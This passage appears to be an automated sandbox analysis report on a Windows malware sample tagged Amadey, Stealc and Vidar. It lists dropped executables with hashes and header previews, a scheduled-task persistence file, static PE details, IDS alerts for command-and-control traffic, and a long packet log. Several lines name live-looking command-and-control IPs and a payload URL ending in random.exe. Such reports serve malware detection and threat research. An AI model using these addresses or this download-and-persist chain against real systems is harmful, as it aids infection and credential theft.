	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16/well/random.exe
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16/well/random.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/well/random.exe
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16/well/random.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/well/random.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1638400
Entropy (8bit):	7.955142396511313
Encrypted:	false
SSDEEP:	24576:ULGk0+QMiQ/s4oeI0uWqD3qcrantWSvMP17B2BSLiI7YJisKRgOLqN:ULGFQluWqDrran/417wBhKjL+
MD5:	7B9E638699028F93A18B56CD366E2F28
SHA1:	7D0245A5AD7DAA8456FCFEE0FAC2CBB906114B03
SHA-256:	85790A170922903D74266882C3A303F3C46656B4C5D6AD8779358E6C522F0D5E
SHA-512:	3B1F47E0BFE72611C62FC91E7D0CAB322DA4469BCCA9ADF243C883A9257C242C88D7E59C607C53EF769F15D1CB47D348BEC8F96ABCD83908FC5E1CF675A19BD2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...M..f.....................B".......i...........@...........................i...........@.................................P.#.d.............................#..................................................................................... . ..#......<..................@....rsrc ......#......L..............@....idata ......#......L..............@... . +...$......N..............@...agodkpeb.p... O..h...P..............@...frgsmfqf......i.....................@....taggant.0....i.."..................@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1884672
Entropy (8bit):	7.949248176915492
Encrypted:	false
SSDEEP:	49152:ReTfFaz/B/1mN6QUASzMvovH/ifnqXkTZROKjVprs:69a+N6QU94oCfH+gvrs
MD5:	457D9A15D305DF62FE34C5076F3CAD9D
SHA1:	7A068FB1E761874759A89534F39C1EB109367448
SHA-256:	572D806C0B56D27FE05562301DE6A9ED45CDA3F36AEF2F6E370867D9F3847013
SHA-512:	5D1F7A3071AD26AB2F2A3B163770A86DED232B038CF05AE9195690BD784F9D5A1D19143ADD444756184E0901D0BDA759140AF9EE35AF75D1E905F3BA493C0E01
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58% Antivirus: Virustotal, Detection: 55%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f..............................J...........@...........................J.....+9....@.................................W...k.............................J.............................P.J..................................................... . ............................@....rsrc...............................@....idata ............................@... .P*.........................@...mlkfqtwe......1.....................@...ezviljwn......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\1000051000\2c422e6624.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1638400
Entropy (8bit):	7.955142396511313
Encrypted:	false
SSDEEP:	24576:ULGk0+QMiQ/s4oeI0uWqD3qcrantWSvMP17B2BSLiI7YJisKRgOLqN:ULGFQluWqDrran/417wBhKjL+
MD5:	7B9E638699028F93A18B56CD366E2F28
SHA1:	7D0245A5AD7DAA8456FCFEE0FAC2CBB906114B03
SHA-256:	85790A170922903D74266882C3A303F3C46656B4C5D6AD8779358E6C522F0D5E
SHA-512:	3B1F47E0BFE72611C62FC91E7D0CAB322DA4469BCCA9ADF243C883A9257C242C88D7E59C607C53EF769F15D1CB47D348BEC8F96ABCD83908FC5E1CF675A19BD2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...M..f.....................B".......i...........@...........................i...........@.................................P.#.d.............................#..................................................................................... . ..#......<..................@....rsrc ......#......L..............@....idata ......#......L..............@... . +...$......N..............@...agodkpeb.p... O..h...P..............@...frgsmfqf......i.....................@....taggant.0....i.."..................@...................................................................................................................................................................................................................................................

C:\Windows\Tasks\explorti.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	288
Entropy (8bit):	3.4359806921285827
Encrypted:	false
SSDEEP:	6:DX4RKUEZ+lX1cI1l6lm6tPjgsW2YRZuy0lbEtft0:D4RKQ1cag7jzvYRQVAtft0
MD5:	CD04D88D3042DE77AD56E1DD87DDB979
SHA1:	44940F793B6E5E97C8ABA5B0D02B1D8DADA4C032
SHA-256:	703B1B31D41B76C78F3FBE404260DFC0135B87FD331EB2EAF3E164031BE6F056
SHA-512:	ED363B5E02D9B8B663905BB32B51E064FB6ACB0F2BA7967D90F94CA6974EE7458655742B04999A1970FF8403BBDDB3D50E0E0053BD45D39AC056AD3F18CA35B3
Malicious:	false
Reputation:	low
Preview:	.......,.D.M.Q.<.&/.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.d.8.f.5.e.b.8.a.7.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.949248176915492
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'884'672 bytes
MD5:	457d9a15d305df62fe34c5076f3cad9d
SHA1:	7a068fb1e761874759a89534f39c1eb109367448
SHA256:	572d806c0b56d27fe05562301de6a9ed45cda3f36aef2f6e370867d9f3847013
SHA512:	5d1f7a3071ad26ab2f2a3b163770a86ded232b038cf05ae9195690bd784f9d5a1d19143add444756184e0901d0bda759140af9ee35af75d1e905f3ba493c0e01
SSDEEP:	49152:ReTfFaz/B/1mN6QUASzMvovH/ifnqXkTZROKjVprs:69a+N6QU94oCfH+gvrs
TLSH:	189533457B2A348FC16F4ABF65B7AD00E31D26EB0EF7DE616C44253909E656023E3C61
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x8ac000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A24110 [Thu Jul 25 12:12:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FA934B65F0Ah
push fs
sbb al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FA934B67F05h
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4aa6a0	0x10	mlkfqtwe
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4aa650	0x18	mlkfqtwe
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2dc00	4aca0145e458d87ae2f6771bf04ffc1f	False	0.9999786543715847	data	7.988355421365411	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	dcf3fb9262bc1e7ce53de36e3dab9b34	False	0.58203125	data	4.543405225559806	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2a5000	0x200	5eb6254b241f8bd7e63ba8c5e40f4d98	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mlkfqtwe	0x310000	0x19b000	0x19aa00	84eb0f165dafeb52f23dcbcf0207cfe2	False	0.9943439640410959	data	7.953079364825396	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ezviljwn	0x4ab000	0x1000	0x400	adab22a91a40aeb9b18cfcc5cb3a582a	False	0.7392578125	data	5.802495446742714	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4ac000	0x3000	0x2200	a09a4aab17da90009e89622a2deb36f9	False	0.05434283088235294	DOS executable (COM)	0.7477435209845513	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4aa6b0	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-09-01T20:07:49.855958+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	1	80	49737	185.215.113.19	192.168.2.4
2024-09-01T20:09:06.811186+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49738	80	192.168.2.4	185.215.113.16
2024-09-01T20:09:05.654798+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	49737	80	192.168.2.4	185.215.113.19

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2024 20:09:04.776560068 CEST	49737	80	192.168.2.4	185.215.113.19
Sep 1, 2024 20:09:04.784066916 CEST	80	49737	185.215.113.19	192.168.2.4
Sep 1, 2024 20:09:04.784164906 CEST	49737	80	192.168.2.4	185.215.113.19
Sep 1, 2024 20:09:04.784384966 CEST	49737	80	192.168.2.4	185.215.113.19
Sep 1, 2024 20:09:04.789221048 CEST	80	49737	185.215.113.19	192.168.2.4
Sep 1, 2024 20:09:05.654714108 CEST	80	49737	185.215.113.19	192.168.2.4
Sep 1, 2024 20:09:05.654798031 CEST	49737	80	192.168.2.4	185.215.113.19
Sep 1, 2024 20:09:05.657558918 CEST	49737	80	192.168.2.4	185.215.113.19
Sep 1, 2024 20:09:05.662343979 CEST	80	49737	185.215.113.19	192.168.2.4
Sep 1, 2024 20:09:05.968554020 CEST	80	49737	185.215.113.19	192.168.2.4
Sep 1, 2024 20:09:05.972673893 CEST	49737	80	192.168.2.4	185.215.113.19
Sep 1, 2024 20:09:05.976645947 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:05.981399059 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:05.984592915 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:05.984725952 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:05.989495993 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:06.811089039 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:06.811148882 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:06.811161041 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:06.811186075 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:06.811211109 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:06.811388016 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:06.811436892 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:06.811469078 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:06.811481953 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:06.811491966 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:06.811513901 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:06.811538935 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:06.812215090 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:06.812232971 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:06.812244892 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:06.812271118 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:06.812289953 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:06.816607952 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:06.816668034 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:06.817040920 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:06.817101955 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.015873909 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.016002893 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.016014099 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.016072989 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.016072989 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.016346931 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.016379118 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.016390085 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.020829916 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.020840883 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.020852089 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.020860910 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.020868063 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.020879030 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.020895004 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.020941019 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.021240950 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.021259069 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.021269083 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.021280050 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.021281004 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.021292925 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.021303892 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.021311998 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.021312952 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.021342993 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.021354914 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.022078991 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.022090912 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.022099972 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.022111893 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.022124052 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.022134066 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.022151947 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.022171021 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.022677898 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.022689104 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.022697926 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.022711992 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.022726059 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.022753954 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.216665030 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.216723919 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.216833115 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.216845989 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.216882944 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.216896057 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.217317104 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.217365026 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.217483997 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.217494011 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.217525005 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.217536926 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.217677116 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.217688084 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.217698097 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.217710972 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.217715979 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.217727900 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.217752934 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.217766047 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.218437910 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.218451023 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.218461037 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.218472004 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.218485117 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.218504906 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.218535900 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.219297886 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.219307899 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.219314098 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.219320059 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.219329119 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.219342947 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.219372988 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.219398975 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.220077991 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.220088005 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.220094919 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.220101118 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.220112085 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.220139027 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.220150948 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.220890045 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.220902920 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.220911980 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.220938921 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.220972061 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.221204042 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.221214056 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.221225977 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.221251965 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.221275091 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.221621990 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.221632957 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.221642971 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.221667051 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.221695900 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.222173929 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.222184896 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.222193956 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.222218037 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.222229004 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.222253084 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:07.222775936 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:07.222788095 CEST	80	49738	185.215.113.16	192.168.2.4
